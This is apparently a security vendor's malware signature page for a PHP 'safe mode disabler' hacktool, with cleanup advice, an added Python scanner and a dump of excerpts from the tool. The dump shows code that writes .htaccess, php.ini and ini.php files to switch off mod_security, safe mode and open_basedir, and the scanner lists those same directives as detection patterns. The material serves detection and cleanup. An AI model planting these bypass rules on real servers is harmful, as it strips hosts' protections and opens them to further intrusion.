Malware Signatures


php.hacktool.safemode-disabler.001

PHP Safe Mode is an attempt to restrict certain system operations at the PHP level to provide better security on shared servers.
For example, in safe mode, PHP processes can open or modify only files that belong to the owner of the original PHP script. Launching external processes via the exec() and system() functions is also prohibited.
It also imposes some restrictions on uploading files. All these restrictions make hacking (especially server-wide) quite difficult. That's why hackers try to disable safe mode if they manage to break into a site.
Once safe mode is disabled, they can use other malicious PHP tools from that site.
Safe Mode disablers are a category of scripts that try to disable PHP safe mode. They typically do it by creating .htaccess and php.ini files with the corresponding rules.

Note: PHP Safe Mode breaks some popular legitimate scripts, so many hosting providers turn it off by default. Moreover, PHP itself deprecated it as of PHP 5.3.0 and completely removed it as of PHP 5.4.0.
Hosting providers should ensure security at the system level rather than rely on the PHP layer.

Affecting

Any server with PHP enabled, especially older versions of PHP.

Cleanup

Delete the malicious script and scan your server for other types of malware and specifically for backdoors. If your server security relies on the safe mode, make sure to find and delete all rules that disable it.
You can also sign up with us and let our team remove the malware for you.
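
As an added example (not part of this signature page or of any vendor tool), the following Python scanner walks a web root looking for the php.ini, .htaccess and ini.php rules this family drops, using only the directives shown in the dump below; the sample web root it builds for the demo is constructed.

```python
import re
import tempfile
from pathlib import Path

# Directives a safe-mode disabler writes (as seen in the excerpts on this page),
# keyed by the file name it drops them into. Matched case-insensitively.
INDICATORS = {
    "php.ini": [r"^\s*safe_mode\s*=\s*off",
                r"^\s*disable_functions\s*=\s*none",
                r"^\s*safe_mode_gid\s*=\s*off",
                r"^\s*open_basedir\s*=\s*off"],
    ".htaccess": [r"^\s*SecFilterEngine\s+Off",
                  r"^\s*SecFilterScanPOST\s+Off"],
    ".php": [r'ini_restore\s*\(\s*["\']safe_mode["\']',
             r'ini_restore\s*\(\s*["\']open_basedir["\']'],
}


def scan_webroot(root):
    """Walk `root` and return (relative path, matched directive) findings."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        name = path.name.lower()
        if name in ("php.ini", ".htaccess"):
            key = name
        elif name.endswith(".php"):
            key = ".php"
        else:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        for pattern in INDICATORS[key]:
            for m in re.finditer(pattern, text, re.IGNORECASE | re.MULTILINE):
                findings.append((str(path.relative_to(root)), m.group(0).strip()))
    return findings


def demo():
    """Build a constructed web root mirroring the dump and scan it."""
    root = tempfile.mkdtemp()
    Path(root, "php.ini").write_text(
        "safe_mode = Off\ndisable_functions = NONE\nsafe_mode_gid = Off\nopen_basedir = Off\n")
    Path(root, ".htaccess").write_text(
        "<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>\n")
    Path(root, "ini.php").write_text('<?\nini_restore("safe_mode");\nini_restore("open_basedir");\n?>')
    Path(root, "index.php").write_text("<?php echo 'hello'; ?>\n")  # benign, must not match
    return scan_webroot(root)


if __name__ == "__main__":
    for rel_path, directive in demo():
        print(f"{rel_path}: {directive}")
```

Run it against a real document root by calling scan_webroot("/path/to/webroot"); every hit is a file to review and, if unexpected, remove.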

Dump

... excerpts ...
...
<title>Safe Mode Fucker</title>
</head>
<body>
<center>
<form method="POST" action="">
<select name="way">
<option>All</option>
<option>php.ini</option>
<option>ini.php</option>
<option>htaccess</option>

...

function bypass_htaccess() {
$htaccess=fopen(getcwd().$slash."/.htaccess","w");
fwrite($htaccess,"
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
");

...

function bypass_php() {
$php=fopen(getcwd().$slash."/php.ini","w");
fwrite($php,"safe_mode = Off
disable_functions = NONE
safe_mode_gid = Off
open_basedir = Off");

...

function bypass_ini()
{
$ini=fopen(getcwd().$slash."/ini.php","w");
fwrite($ini,'<?
ini_restore("safe_mode");
ini_restore("open_basedir");
?>');